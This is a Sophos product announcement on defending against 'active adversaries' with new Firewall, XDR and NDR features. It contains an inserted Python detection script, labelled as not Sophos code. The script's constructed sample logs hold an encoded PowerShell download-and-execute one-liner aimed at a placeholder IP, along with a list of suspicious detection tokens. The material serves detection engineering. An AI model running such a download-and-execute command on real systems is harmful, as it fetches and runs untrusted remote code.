New capabilities to further enable organizations to defend against active adversaries.
Active adversaries are now a major threat to organizations of all sizes. These highly skilled cybercriminals keep developing and evolving their techniques in response to stronger defenses, executing attacks at scale and using methods specifically designed to avoid triggering preventative security controls.
We are excited to announce the addition of new capabilities to Sophos Firewall, Sophos XDR, and Sophos NDR solutions to further enable organizations to defend against these active adversaries.
What are active adversaries and how do they operate?
Active adversaries are highly skilled cybercriminals, often equipped with sophisticated software and networking skills, who gain entry into an organization's systems, evade detection and continuously adapt their techniques, using hands-on-keyboard and AI-assisted methods to circumvent preventative security controls and execute their attacks.
Organizations need adaptive security controls designed to detect and respond to the approaches commonly used by active adversaries:
Multi-stage attacks
Attacks that end in a different place than they started
Active adversaries execute attacks that cross multiple domains across the victim's environment. The full scope of these attacks cannot be detected by a single point product. Organizations need visibility across their entire ecosystems.
Living off the land attacks
Attacks that use legitimate tools in malicious ways
Preventative security tools are unable to block the use of legitimate IT tools without the risk of causing significant operational disruption. Attackers take advantage of this by using legitimate IT tools like RDP and PowerShell to blend into the background.
Unknown vulnerabilities
Attacks that leverage a weakness, flaw, or error in software
Attackers exploit zero-day and unpatched vulnerabilities to execute attacks: 65% of ransomware attacks start with an attacker exploiting an unknown vulnerability or logging in using legitimate credentials.
Credential abuse
Attacks that start with an adversary logging in instead of breaking in
Active adversaries use compromised legitimate user credentials to log in and execute their attacks. Because the login itself is valid, preventative security tools are unable to block or detect it until the "user" demonstrates suspicious or malicious behavior.
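The living-off-the-land and credential-abuse patterns above are only detectable after the fact, by correlating behaviour that is individually legitimate. The script below is an added example, not Sophos code, of the kind of correlation a detection engineer would write: it takes constructed, pipe-delimited telemetry modelled loosely on Windows logon (4624, logon type 10 = RDP) and process-creation (4688) events, decodes any PowerShell -EncodedCommand payload (UTF-16LE, then base64, which is how PowerShell builds them), looks for known download-and-execute tokens, and raises the severity when the same account logged in over RDP on the same host shortly before. The log format, token list and 30-minute window are assumptions chosen for illustration.

```python
"""Behaviour-based detection for 'log in, then live off the land' activity.

Added example (not Sophos code). Correlates a valid RDP logon with a later
encoded PowerShell launch by the same account on the same host.
The log format, token list and time window are illustrative assumptions.
"""
import base64
import binascii
import re
from datetime import datetime, timedelta

# Tokens that commonly appear in download-and-execute PowerShell one-liners.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring",
              "net.webclient", "frombase64string")
# How far back to look for an RDP logon by the same user on the same host.
RDP_WINDOW = timedelta(minutes=30)


def encode_ps(cmd: str) -> str:
    """Build a PowerShell -EncodedCommand payload: UTF-16LE, then base64."""
    return base64.b64encode(cmd.encode("utf-16le")).decode("ascii")


# Constructed sample telemetry (ts|host|event_id|user|detail); not real logs.
SAMPLE_LOG = "\n".join([
    "2023-11-01T02:10:05|FS01|4624|jsmith|logon_type=10 src=203.0.113.7",
    "2023-11-01T02:11:40|FS01|4688|jsmith|cmd=powershell.exe -nop -w hidden -enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.2/a')"),
    "2023-11-01T09:00:12|WS22|4624|alee|logon_type=2 src=-",
    "2023-11-01T09:03:00|WS22|4688|alee|cmd=powershell.exe -File C:\\scripts\\backup.ps1",
    "2023-11-01T13:20:00|FS01|4688|svc_backup|cmd=powershell.exe -enc " + encode_ps("Get-Date"),
])


def parse(log: str) -> list:
    """Turn the pipe-delimited lines into event dicts with parsed timestamps."""
    events = []
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, host, event_id, user, detail = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "event_id": event_id, "user": user, "detail": detail})
    return events


def decode_encoded_command(cmd: str):
    """Return the decoded script behind -e/-enc/-EncodedCommand, or None."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", cmd, re.I)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
        return raw.decode("utf-16le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def detect(log: str) -> list:
    """Alert on encoded PowerShell with suspicious content; escalate if it
    follows an RDP logon by the same user on the same host."""
    events = parse(log)
    rdp_logons = [e for e in events
                  if e["event_id"] == "4624" and "logon_type=10" in e["detail"]]
    alerts = []
    for e in events:
        if e["event_id"] != "4688" or "powershell" not in e["detail"].lower():
            continue
        cmd = e["detail"].partition("cmd=")[2]
        script = decode_encoded_command(cmd)
        if script is None:
            continue  # plain script invocations are too noisy to alert on alone
        hits = [t for t in SUSPICIOUS if t in script.lower()]
        if not hits:
            continue
        prior_rdp = [l for l in rdp_logons
                     if l["user"] == e["user"] and l["host"] == e["host"]
                     and timedelta(0) <= e["ts"] - l["ts"] <= RDP_WINDOW]
        alerts.append({
            "ts": e["ts"].isoformat(), "host": e["host"], "user": e["user"],
            "severity": "high" if prior_rdp else "medium",
            "indicators": hits,
            "rdp_logon": prior_rdp[-1]["ts"].isoformat() if prior_rdp else None,
        })
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

Only the jsmith sequence fires here: the encoded command decodes to a download-and-execute one-liner and it follows a valid RDP logon by the same account, so the alert is rated high. The svc_backup encoded command decodes to a benign cmdlet and the alee invocation is not encoded at all, so neither is reported; that is the trade-off the passage describes, since blocking PowerShell or RDP outright would break legitimate administration.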
Our new Active Adversary Report for Security Practitioners highlights key changes in adversary behavior over the last year, including:
Attackers are speeding up. Dwell time in ransomware is rapidly decreasing, down from nine days in 2022 to five days in the first half of 2023.
Adversaries frequently abuse legitimate IT tools. The LOLBins (Living-off-the-Land Binaries) and techniques used by active adversaries do not vary substantially between fast (less than five days dwell time) and slow (more than five days dwell time) attacks.
Active adversaries will innovate when they must, and only to the extent that it gets them to their target.
The report highlights the need for organizations to understand how active adversaries behave and to have visibility across their security ecosystems to detect quickly and respond even faster.
What’s new?
We’re adding new capabilities to the Sophos platform across Sophos XDR, Sophos Firewall, and Sophos NDR that give organizations even greater power to defend against active adversaries:
Sophos Firewall – now with Active Threat Response
Now available!
The new Active Threat Response feature in Sophos Firewall v20 provides instant and automated response to active adversaries. Sophos XDR and MDR analysts can push threat intel to firewalls directly from Sophos Central, enabling the firewalls to coordinate defenses immediately without the need for manual intervention or new firewall rules.
Sophos NDR – now available for XDR
Available November 20, 2023
Sophos Network Detection and Response (NDR) detects active adversaries moving across an organization's network between devices. Previously available only as an add-on to Sophos MDR, Sophos NDR is now available as an add-on to Sophos XDR, for organizations that manage their own detection and response activities.
Sophos XDR – now with expanded third-party compatibility and optimized UX
Available November 20, 2023
We're significantly expanding the range of third-party tools and products that customers can integrate with Sophos XDR, across endpoint, firewall, cloud, identity, network, email, and productivity categories. Sophos XDR consolidates security data and provides a single console for customers to work from, with optimized workflows that reduce their investigation workloads.
Point products vs. connected products and services that work together
Attackers continuously adapt their techniques, and each new approach tends to bring a new point product to defend against it. Disparate tools, however, typically do not communicate well with each other. Sophos provides a unified platform that incorporates a broad portfolio of cybersecurity products and services engineered to work together seamlessly. Because it is also compatible with third-party technologies, Sophos' connected ecosystem provides automated actions and correlated data, allowing organizations to detect, investigate, and respond to active adversaries faster, across all key attack surfaces.